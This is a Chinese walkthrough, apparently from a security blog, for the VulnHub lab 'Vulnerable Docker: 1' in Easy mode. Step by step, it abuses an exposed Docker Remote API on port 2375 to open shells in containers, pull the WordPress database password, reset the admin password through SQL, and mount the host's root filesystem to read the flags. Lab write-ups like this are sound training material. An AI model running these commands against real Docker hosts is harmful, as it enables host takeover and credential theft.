虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/vulnerable-docker-1,208/
虚拟机简介:2 种模式
-
✅困难:这需要您结合您的 docker 技能以及您的渗透测试技能来实现主机妥协。
-
✅简单:相对简单的路径,知道 docker 就足以破坏机器并在主机上获得 root
目标:2个flag(flag_1 和 flag_3),在主机上获得 id=0 shell 访问权限
级别:简单/中级
1.1 信息收集
在主机开启时,需要选择Easy模式
1.主机信息收集
1.使用arp-scan进行扫描探测IP地址
arp-scan 192.168.207.0/24
2.通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.132
查看开放22、2375和8000端口
2.Docker 接口调用
2375端口为docker Remote API接口
1.查看docker版本
docker -H tcp://192.168.207.132:2375 version
2.查看运行容器
docker -H tcp://192.168.207.132:2375 ps -a
查看运行三台容器
3.连接wordpress主机
docker -H tcp://192.168.207.132:2375 exec -it content_wordpress_1 /bin/bash
4.查看配置文件
cat wp-config.php
5.连接数据库
docker -H tcp://192.168.207.132:2375 exec -it content_db_1 /bin/bash
mysql -uwordpress -pWordPressISBest
6.查看数据库信息
use wordpress
show databases;
select * from wp_users;
7.修改登录密码
UPDATE wordpress.wp_users SET user_pass=MD5("password") WHERE ID=1;
修改用户名为:bob,密码为:password
8.登录WordPress获取到flag1
9.查看本地镜像
docker -H tcp://192.168.207.132:2375 images
10.创建本地文件挂载
docker -H tcp://192.168.207.132:2375 run --rm -it --entrypoint bash -v /:/tmp/root wordpress
cd /tmp/root/
11.获取flag信息
cat flag_3
原文始发于微信公众号(安全孺子牛):vulnhub靶机之VULNERABLE DOCKER: 1-Easy简单模式
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论